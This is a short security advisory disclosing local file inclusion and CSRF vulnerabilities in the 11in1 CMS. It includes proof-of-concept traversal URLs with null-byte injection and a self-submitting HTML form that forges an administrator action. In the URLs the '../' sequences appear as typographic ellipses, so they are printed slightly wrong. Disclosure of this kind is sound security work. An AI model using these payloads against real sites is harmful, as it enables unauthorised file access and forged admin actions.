Multiple vulnerabilities in 11in1

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion and Сross-Site Request Forgery (CSRF) attacks.

1. Local File Inclusion in 11in1: CVE-2012-0996
   Input passed via the “class” GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
   This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
   The following PoC (Proof of Concept) demostrate the vulnerability:
   http://[host]/index.php?class=…/…/…/tmp/file%00
   http://[host]/admin/index.php?class=…/…/…/tmp/file%00
   Successful exploitation of the vulnerabilities requires that “magic_quotes_gpc” is off.

2. Сross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997
   The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.
   An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.
   The following PoC will create a new topic on behalf of website administrator:
   <form action=“http://[host]/admin/index.php?class=do&action=addTopic” method=“post”>
   <input type=“hidden” name=“name” value=“New Topic Name here”>
   <input type=“hidden” name=“sec” value=“3”>
   <input type=“hidden” name=“content” value=“New Topic Content here”>
   <input type=“submit” id=“btn”>
   </form>
   <script>
   document.getElementById(‘btn’).click();
   </script>